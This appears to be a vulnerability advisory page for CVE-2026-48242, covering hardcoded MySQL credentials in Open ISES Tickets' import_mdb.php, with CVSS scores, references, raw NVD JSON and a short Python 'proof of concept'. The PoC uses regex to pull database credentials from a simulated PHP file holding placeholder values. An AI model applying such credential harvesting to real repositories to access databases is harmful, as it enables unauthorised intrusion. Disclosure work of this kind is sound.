CVE-2026-48242

Description

Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open ISES Tickets < 3.44.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-48242
# This script demonstrates how to extract hardcoded credentials from the vulnerable file.

import re

# Simulating the content of the vulnerable import_mdb.php
VULNERABLE_FILE_CONTENT = """
<?php
$db_host = 'mysql.example.com';
$db_user = 'ises_admin';
$db_pass = 'S3cr3tP@ssw0rd!';
$db_name = 'ises_tickets_db';
// ... rest of the code
?>
"""

def extract_credentials(php_content):
    """Extracts hardcoded MySQL credentials from PHP source code."""
    credentials = {}
    # Regex patterns to find common variable assignments
    patterns = {
        'host': r'\$db_host\s*=\s*[\'"](.*?)[\'"]',
        'username': r'\$db_user\s*=\s*[\'"](.*?)[\'"]',
        'password': r'\$db_pass\s*=\s*[\'"](.*?)[\'"]',
        'database': r'\$db_name\s*=\s*[\'"](.*?)[\'"]'
    }

    for key, pattern in patterns.items():
        match = re.search(pattern, php_content)
        if match:
            credentials[key] = match.group(1)

    return credentials

if __name__ == "__main__":
    print("[+] Analyzing import_mdb.php for hardcoded credentials...")
    creds = extract_credentials(VULNERABLE_FILE_CONTENT)
    
    if creds:
        print("[!] Hardcoded credentials found:")
        for k, v in creds.items():
            print(f"    {k}: {v}")
        print("\n[!] Attackers can now use these credentials to access the database directly.")
    else:
        print("[-] No credentials found.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-48242
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-48242
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-48242/
[4] VulDB https://vuldb.com/cve/CVE-2026-48242
[5] https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
[6] https://github.com/openises/tickets/releases/tag/v3.44.2
[7] https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-mysql-credentials-in-import-mdb-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-48242", "sourceIdentifier": "[email protected]", "published": "2026-05-21T18:16:21.220", "lastModified": "2026-05-21T19:10:12.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff", "source": "[email protected]"}, {"url": "https://github.com/openises/tickets/releases/tag/v3.44.2", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-mysql-credentials-in-import-mdb-php", "source": "[email protected]"}]}}